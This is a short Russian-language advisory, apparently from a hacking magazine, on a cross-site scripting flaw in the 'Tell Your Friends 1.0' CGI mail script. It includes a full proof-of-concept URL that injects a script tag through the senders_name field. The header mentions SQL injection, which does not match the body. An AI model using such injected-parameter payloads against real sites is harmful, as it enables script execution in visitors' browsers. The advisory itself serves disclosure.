Хакер #305. Многошаговые SQL-инъекции
Tell Your Friends - сценарий, с помощью которого
вы можете рекомендовать страницу друзьям по e-mail. Из-за недостаточной
фильтрации в полях формы, удаленный атакующий может сконструировать
специальный скрипт, содержащий произвольный html или javascript код,
который и будет выполнен в браузера пользователя из контекста уязвимого
сайта.
http://www.cgitoolbox.com/cgi/friends/send/mail-form.cgi?action=newemail&
admin_email=support@microsoft.com&admin_graphic=http://www.epacep.com/new.gif
&admin_url=www.epacep.com&admin_sitename=name&message=visit%20www.microsoft.com
&emailit=1&senders_name=><script>alert("eraser%20was%20here%20:)")</script>
&senders_email=tut@mail.com&rec_name=imya&rec_email=komu@shlem.ru
Tell Your Friends 1.0.